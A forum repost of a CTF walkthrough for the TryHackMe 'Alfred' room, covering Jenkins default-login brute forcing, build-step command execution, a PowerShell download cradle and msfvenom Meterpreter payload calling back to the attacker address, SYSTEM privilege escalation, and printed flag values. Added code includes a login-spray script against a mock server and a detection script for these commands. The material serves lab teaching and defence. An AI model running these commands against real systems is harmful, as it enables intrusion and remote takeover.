[Tut] TryHackMe Alfred – How I Solved The Challenge [+Video] - Sick Gaming (https://www.sickgaming.net), Forum: Programming > Python, Thread: /thread-100489.html
[Tut] TryHackMe Alfred – How I Solved The Challenge [+Video] - xSicKxBot - 12-28-2022

<div> <figure class="wp-block-embed-youtube wp-block-embed is-type-video is-provider-youtube"><a href="https://blog.finxter.com/tryhackme-alfred-how-i-solved-the-challenge/"><img src="https://blog.finxter.com/wp-content/plugins/wp-youtube-lyte/lyteCache.php?origThumbUrl=https%3A%2F%2Fi.ytimg.com%2Fvi%2FGkMOsGp6mco%2Fhqdefault.jpg" alt="YouTube Video"></a><figcaption></figcaption></figure> <p>In this Capture the Flag (CTF) walkthrough, I’ll break into Jenkins, a build automation server running on a Windows host, turn its build configuration into Remote Command Execution (RCE), use that foothold to deliver a Metasploit payload, and escalate my privileges to <code>NT AUTHORITY\SYSTEM</code>, the Windows equivalent of <code>root</code>. </p> <p class="has-global-color-8-background-color has-background">⚔ <strong>Challenge</strong>: I need to capture two “flags”, the <code>user.txt</code> flag and the <code>root.txt</code> flag. 
Let’s get started!</p> <p>First, we note down our own VPN address and the target’s address, export them as shell variables so we can reuse them, and run an nmap scan with <code>-Pn</code>. That flag skips host discovery: the Windows target does not answer ping, so without it nmap would declare the host down and scan nothing. The target address differs between the captured outputs below; use whatever address TryHackMe assigned to your instance.</p> <h2>INITIAL ENUMERATION</h2> <div class="wp-block-image"> <figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="956" height="637" src="https://blog.finxter.com/wp-content/uploads/2022/12/image-315.png" alt="" class="wp-image-1000265" srcset="https://blog.finxter.com/wp-content/uploads/2022/12/image-315.png 956w, https://blog.finxter.com/wp-content/uploads/2022/12/image-315-300x200.png 300w, https://blog.finxter.com/wp-content/uploads/2022/12/image-315-768x512.png 768w" sizes="(max-width: 956px) 100vw, 956px" /></figure> </div> <pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">
# IPs
export myIP=10.6.2.23
export targetIP=10.10.99.176

┌──(tester㉿box)-[~/THM]
└─$ nmap 10.10.216.90 -Pn
Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-10 22:39 EST
Nmap scan report for 10.10.216.90
Host is up (0.083s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT     STATE SERVICE
80/tcp   open  http
3389/tcp open  ms-wbt-server
8080/tcp open  http-proxy

Nmap done: 1 IP address (1 host up) scanned in 7.05 seconds
</pre> <p>Three ports are open. Keep in mind that without <code>-sV</code> nmap does not probe the services at all; the SERVICE column is just the name its port table associates with each port number. </p> <p>Port 80 is an HTTP service, presumably a website, which we will look at in a browser in a moment. </p> <p>The <code>ms-wbt-server</code> label on port 3389 is nmap’s name for Microsoft Terminal Services, that is, the Remote Desktop Protocol (RDP). It is worth remembering, since valid credentials would give us an interactive desktop on the box. </p> <p>The <code>http-proxy</code> label on 8080 is only the port-table guess; a version scan with <code>-sV</code>, or simply opening the port in a browser, reveals what actually listens there. On port 80 we find a picture of Batman in plain clothes. There is not much to see here. 
A quick look at the HTML source does not reveal anything else of interest.</p> <h2>HACKING JENKINS WITH BURPSUITE</h2> <div class="wp-block-image"> <figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="955" height="637" src="https://blog.finxter.com/wp-content/uploads/2022/12/image-317.png" alt="" class="wp-image-1000275" srcset="https://blog.finxter.com/wp-content/uploads/2022/12/image-317.png 955w, https://blog.finxter.com/wp-content/uploads/2022/12/image-317-300x200.png 300w, https://blog.finxter.com/wp-content/uploads/2022/12/image-317-768x512.png 768w" sizes="(max-width: 955px) 100vw, 955px" /></figure> </div> <p>On port 8080 we find the login page of Jenkins, the build automation server.</p> <p>Let’s try a few of the usual default credentials: <code>admin:password</code>, <code>admin:admin</code>, and so on. </p> <p>With Burp’s proxy we intercept one login request (a POST of <code>j_username</code> and <code>j_password</code> to <code>/j_acegi_security_check</code>), send it to Intruder, mark the password field as the payload position and load a short list of candidate passwords. In Sniper mode Intruder substitutes one position at a time, which is what we want here: the username stays fixed at <code>admin</code> while each password is tried. (To vary both fields at once, switch to Cluster bomb.) </p> <p>Jenkins answers every attempt with a 302 redirect, so the status code tells us nothing; the response length and the <code>Location</code> header do. A failed login redirects to <code>/loginError</code>, and the one attempt whose response differs, <code>admin:admin</code>, is our winning combination. We are in luck that this company has lazy administrators who do not safeguard their build server! Jenkins lets us in with <code>admin:admin</code>.</p> <p>Following TryHackMe’s suggestion, we will use Nishang to spawn a reverse shell from Windows. Inside the Jenkins dashboard we open project 1 and click Configure. </p> <p>The last text box on that page is a build step that runs a Windows batch command on the Jenkins host every time the job is built. Because the Jenkins service executes whatever we type there, this is our remote command execution. 
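</p> <p>The last two steps, recognising that port 8080 is Jenkins rather than a generic “http-proxy” and finding <code>admin:admin</code> with Intruder, can also be scripted. The Python below is an added example written for this page, not code from the walkthrough or from Jenkins. The only server it talks to is a constructed stand-in that imitates the two behaviours the checks rely on (Jenkins puts an <code>X-Jenkins</code> header on its responses, and its form login answers with a 302 to <code>/loginError</code> on a bad password and a 302 to the requested page on a good one); the version string, the password list and the <code>admin:admin</code> pair the stand-in accepts are made up for the demo. The same functions work against a live instance by passing <code>http://&lt;target&gt;:8080</code> as <code>base</code>.</p>

```python
"""Fingerprint a Jenkins instance and spray a short default-credential list.

Added example for this page; it is not code from the walkthrough or from Jenkins.
The only server it contacts is MockJenkins, a constructed stand-in that mimics
the two behaviours the checks rely on: Jenkins puts an X-Jenkins header on its
responses, and its form login answers a bad password with a 302 to /loginError
and a good one with a 302 to the 'from' page. MOCK_VERSION and MOCK_VALID are
made up for the demo.
"""
import http.server
import threading
import urllib.error
import urllib.parse
import urllib.request

MOCK_VERSION = "2.190.1"         # assumed version string, any value will do
MOCK_VALID = {"admin": "admin"}  # the one pair the stand-in accepts


class MockJenkins(http.server.BaseHTTPRequestHandler):
    """Just enough of Jenkins to exercise fingerprint() and try_login()."""

    def log_message(self, *args):
        pass  # keep the demo quiet

    def do_GET(self):
        self.send_response(200)
        self.send_header("X-Jenkins", MOCK_VERSION)
        self.send_header("Content-Type", "text/html")
        self.end_headers()
        self.wfile.write(b"<html><body>Jenkins login</body></html>")

    def do_POST(self):
        length = int(self.headers.get("Content-Length", 0))
        form = urllib.parse.parse_qs(self.rfile.read(length).decode())
        user = form.get("j_username", [""])[0]
        password = form.get("j_password", [""])[0]
        ok = MOCK_VALID.get(user) == password
        # Real Jenkins answers both outcomes with a 302; only Location differs.
        self.send_response(302)
        self.send_header("Location", form.get("from", ["/"])[0] if ok else "/loginError")
        self.end_headers()


def start_mock():
    """Start the stand-in on a free loopback port; returns (server, base_url)."""
    srv = http.server.ThreadingHTTPServer(("127.0.0.1", 0), MockJenkins)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, "http://127.0.0.1:%d" % srv.server_address[1]


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    """Do not follow 302s: the Location header is the signal we read."""

    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


_OPENER = urllib.request.build_opener(_NoRedirect)


def fingerprint(base):
    """Return the X-Jenkins header of the front page, or None if it is absent.
    nmap's 'http-proxy' label for 8080 is a port-table guess; this is a real check."""
    try:
        with _OPENER.open(base + "/", timeout=5) as resp:
            return resp.headers.get("X-Jenkins")
    except urllib.error.HTTPError as err:   # a 302 or 403 still carries the header
        return err.headers.get("X-Jenkins")


def try_login(base, user, password):
    """One attempt against Jenkins' form-login endpoint. True on success."""
    body = urllib.parse.urlencode({"j_username": user, "j_password": password,
                                   "from": "/", "Submit": "Sign in"}).encode()
    req = urllib.request.Request(base + "/j_acegi_security_check", data=body)
    try:
        _OPENER.open(req, timeout=5)
        return False                       # a 200 here is not the login flow
    except urllib.error.HTTPError as err:  # urllib raises on the unfollowed 302
        location = err.headers.get("Location", "")
        return err.code == 302 and "loginError" not in location


def spray(base, users, passwords):
    """Intruder 'Sniper' in code: each username stays fixed while every password
    is tried against it. Returns the (user, password) pairs that logged in."""
    return [(u, p) for u in users for p in passwords if try_login(base, u, p)]


def demo():
    """Run the whole flow against the stand-in and return what it learned."""
    srv, base = start_mock()
    try:
        return {"version": fingerprint(base),
                "hits": spray(base, ["admin"], ["password", "jenkins", "admin"])}
    finally:
        srv.shutdown()
        srv.server_close()


if __name__ == "__main__":
    print(demo())
```

<p>The <code>X-Jenkins</code> value is the server version, which is what you would look up for known vulnerabilities before trying passwords at all. Jenkins does not lock accounts after failed logins by default, so a short default-credential list is safe to try; on a real engagement keep the list short and stay within scope. 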
</p> <h2>USING REMOTE COMMAND EXECUTION TO SPAWN A REVSHELL PAYLOAD</h2> <div class="wp-block-image"> <figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="425" height="637" src="https://blog.finxter.com/wp-content/uploads/2022/12/image-316.png" alt="" class="wp-image-1000272" srcset="https://blog.finxter.com/wp-content/uploads/2022/12/image-316.png 425w, https://blog.finxter.com/wp-content/uploads/2022/12/image-316-200x300.png 200w" sizes="(max-width: 425px) 100vw, 425px" /></figure> </div> <p>First, let’s spawn a reverse shell with <code>Invoke-PowerShellTcp.ps1</code> from <a rel="noreferrer noopener" href="https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1" target="_blank">nishang’s git repo</a>. The script only defines the <code>Invoke-PowerShellTcp</code> function, so after downloading it we append one line that calls the function with our listener’s address, <code>Invoke-PowerShellTcp -Reverse -IPAddress 10.6.2.23 -Port 8888</code>, and serve the file from the directory it sits in with <code>python -m http.server 8000</code> (the same server is used again for <code>shell.exe</code> below). Then we launch a Netcat listener on the port the script will call back to: </p> <pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">nc -lnvp 8888</pre> <p>Now we put the following download cradle into the build step of Jenkins project 1. It fetches the script from our HTTP server and runs it in memory with <code>iex</code> (<code>Invoke-Expression</code>), so nothing is written to disk:</p> <pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">powershell iex (New-Object Net.WebClient).DownloadString('http://10.6.2.23:8000/Invoke-PowerShellTcp.ps1')</pre> <p>After clicking “<code>Build Now</code>” in the Jenkins dashboard, we catch the shell on our Netcat listener and find the <code>user.txt</code> flag!</p> <pre class="wp-block-preformatted"><code><strong>user.txt:</strong> 79007a09481963edf2e1321abd9ae2a0</code></pre> <h2>USING MSFVENOM TO CREATE A MALICIOUS PAYLOAD</h2> <div class="wp-block-image"> <figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="425" height="637" src="https://blog.finxter.com/wp-content/uploads/2022/12/image-318.png" alt="" class="wp-image-1000279" srcset="https://blog.finxter.com/wp-content/uploads/2022/12/image-318.png 425w, https://blog.finxter.com/wp-content/uploads/2022/12/image-318-200x300.png 200w" sizes="(max-width: 425px) 100vw, 425px" /></figure> </div> <p>A plain PowerShell shell is enough for the user flag, but for privilege escalation we want the richer Meterpreter shell. We generate a staged reverse-TCP Meterpreter executable on the attack box (msfvenom does not need <code>sudo</code>); <code>LHOST</code> and <code>LPORT</code> are our VPN address and the port our handler will listen on. The encoder is optional here; it does not get past modern antivirus on its own.</p> <pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=10.6.2.23 LPORT=4444 -f exe -o shell.exe</pre> <p>Next we start the Metasploit console:</p> <pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">msfconsole</pre> <p>Load the generic handler that will catch the callback:</p> <pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">use exploit/multi/handler</pre> <p>Set the payload and the same <code>LHOST</code>/<code>LPORT</code> that were baked into <code>shell.exe</code>, otherwise the handler will never see the connection:</p> <pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">set payload windows/meterpreter/reverse_tcp
set LHOST 10.6.2.23
set LPORT 4444</pre> <p>And finally, type: <code>run</code></p> <p>With the handler waiting, we serve <code>shell.exe</code> to the target from the directory it is in (if the HTTP server from the previous step is still running there, this is already done):</p> <pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">python -m http.server 8000</pre> <p>Then we fetch the file onto the target with another build of project 1, again through the batch build step. The relative file name lands in the job’s workspace, which is the working directory of the build step:</p> <pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">powershell "(New-Object System.Net.WebClient).DownloadFile('http://10.6.2.23:8000/shell.exe','shell.exe')"</pre> <p>Downloading does not execute the file. Our HTTP server logs the request (status code 200), but no session appears until we run the binary with one more build of the job:</p> <pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">.\shell.exe</pre> <p>Metasploit then reports a new Meterpreter session from the target box.</p> <h2>PRIVILEGE ESCALATION TO ROOT</h2> <div class="wp-block-image"> <figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="956" height="637" src="https://blog.finxter.com/wp-content/uploads/2022/12/image-319.png" alt="" class="wp-image-1000292" srcset="https://blog.finxter.com/wp-content/uploads/2022/12/image-319.png 956w, https://blog.finxter.com/wp-content/uploads/2022/12/image-319-300x200.png 300w, https://blog.finxter.com/wp-content/uploads/2022/12/image-319-768x512.png 768w" sizes="(max-width: 956px) 100vw, 956px" /></figure> </div> <p>First, we issue the following 
command in our Meterpreter session to try Metasploit’s built-in local privilege-escalation techniques (named-pipe impersonation and token duplication) one after another:</p> <pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">getsystem</pre> <p><code>getsystem</code> works by impersonation: our process is still the one Jenkins started, but it now carries a token for <code>NT AUTHORITY\SYSTEM</code>. That is enough for most operations, but not for every command, so the standard next step is to migrate into a process that genuinely runs as SYSTEM. </p> <p>The <code>ps</code> command lists the processes with their PIDs and owners. We pick the one used here, <code>system.exe</code>, and move into it:</p> <p><code>migrate &lt;PID&gt;</code> (the process ID of a process owned by <code>NT AUTHORITY\SYSTEM</code>, in this case <code>system.exe</code>)</p> <p>Our Meterpreter now lives inside that SYSTEM-owned process. We have full <code>NT AUTHORITY\SYSTEM</code> privileges and can locate <code>root.txt</code> with Meterpreter’s <code>search</code> command and read it with <code>cat</code>, giving <code>cat</code> the full path that <code>search</code> printed:</p> <pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">search -f root.txt
cat root.txt
dff0f748678f280250f25a45b8046b4a</pre> <p>Thanks for reading/watching my walkthrough. 🙏</p> </div> https://www.sickgaming.net/blog/2022/12/25/tryhackme-alfred-how-i-solved-the-challenge-video/ |
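Seen from the target, the three build steps above (the cradle that loads nishang, the <code>DownloadFile</code> of <code>shell.exe</code>, and running <code>shell.exe</code>) all look alike: the Jenkins service, a Java process, spawns <code>cmd.exe</code>, which spawns <code>powershell.exe</code> or the dropped binary. The Python below is an added example for this page, not code from the walkthrough or from any detection product. It runs the two rules a defender would write for this over constructed process-creation events (Sysmon Event ID 1 fields exported as JSON lines; the install path, workspace path, batch-file name and user names are made up). The two command lines are the ones the walkthrough sends through the build step; the third event is the <code>DownloadFile</code> command passed through PowerShell’s <code>-EncodedCommand</code>, which the rule has to decode before it can match.

```python
"""Flag Jenkins build-step abuse in process-creation telemetry.

Added example for this page, not code from the walkthrough or from any
detection product. SAMPLE_LOG is constructed: JSON lines shaped like Sysmon
Event ID 1 records reduced to the four fields used here. The install path,
workspace path, batch-file name and user names are made up; the first two
command lines are the ones the walkthrough runs through the Jenkins build step,
and the third is the DownloadFile one wrapped in -EncodedCommand.
"""
import base64
import binascii
import json
import re

CI_PARENTS = ("java.exe",)   # Jenkins controllers and agents are Java processes
SHELLS = ("cmd.exe", "powershell.exe", "pwsh.exe")
CRADLE_MARKERS = ("downloadstring", "downloadfile", "net.webclient",
                  "invoke-expression", "iex ", "iex(", "invoke-webrequest")
ENCODED_RE = re.compile(r"(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)


def basename(path):
    """Last path component, lower-cased, tolerant of either slash."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline):
    """Plaintext of a -EncodedCommand argument, or "" if there is none.
    PowerShell expects base64 over UTF-16LE, so that is what is undone here."""
    match = ENCODED_RE.search(cmdline)
    if not match:
        return ""
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return ""


def classify(event):
    """Names of the rules one event trips; an empty list means benign."""
    hits = []
    image, parent = basename(event["Image"]), basename(event["ParentImage"])
    if image in SHELLS and parent in CI_PARENTS:
        hits.append("ci_server_spawned_shell")
    text = event["CommandLine"].lower()
    decoded = decode_encoded_command(event["CommandLine"])
    if decoded:
        hits.append("powershell_encoded_command")
        text += " " + decoded.lower()       # match on what actually runs
    if image in ("powershell.exe", "pwsh.exe") and any(m in text for m in CRADLE_MARKERS):
        hits.append("powershell_download_cradle")
    return hits


def analyze(log_text):
    """Run classify() over newline-delimited JSON events and return the alerts."""
    alerts = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        event = json.loads(line)
        hits = classify(event)
        if hits:
            alerts.append({"user": event["User"], "image": basename(event["Image"]),
                           "rules": hits})
    return alerts


def build_sample_log():
    """Constructed telemetry (not real logs), in the order the attack happens."""
    ps = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    cmd = "C:\\Windows\\System32\\cmd.exe"
    dl = "(New-Object System.Net.WebClient).DownloadFile('http://10.6.2.23:8000/shell.exe','shell.exe')"
    encoded = base64.b64encode(dl.encode("utf-16-le")).decode()
    events = [
        {"Image": cmd, "ParentImage": "C:\\Jenkins\\jre\\bin\\java.exe",
         "CommandLine": "cmd /c call C:\\Jenkins\\workspace\\project\\hudson7.bat",
         "User": "CORP\\svc_jenkins"},
        {"Image": ps, "ParentImage": cmd,
         "CommandLine": "powershell iex (New-Object Net.WebClient).DownloadString('http://10.6.2.23:8000/Invoke-PowerShellTcp.ps1')",
         "User": "CORP\\svc_jenkins"},
        {"Image": ps, "ParentImage": cmd,
         "CommandLine": "powershell -NoProfile -enc " + encoded,
         "User": "CORP\\svc_jenkins"},
        {"Image": ps, "ParentImage": "C:\\Windows\\explorer.exe",
         "CommandLine": "powershell Get-Service Jenkins",
         "User": "CORP\\alice"},
    ]
    return "\n".join(json.dumps(e) for e in events)


SAMPLE_LOG = build_sample_log()

if __name__ == "__main__":
    for alert in analyze(SAMPLE_LOG):
        print(alert)
```

The parent-child rule fires on the very first build step regardless of what command it runs, which makes it the more durable of the two; the cradle rule is easy to evade with obfuscation, which is why the encoded-command case is decoded rather than matched on the base64 text. In a real pipeline the events would come from Sysmon or an EDR rather than a string.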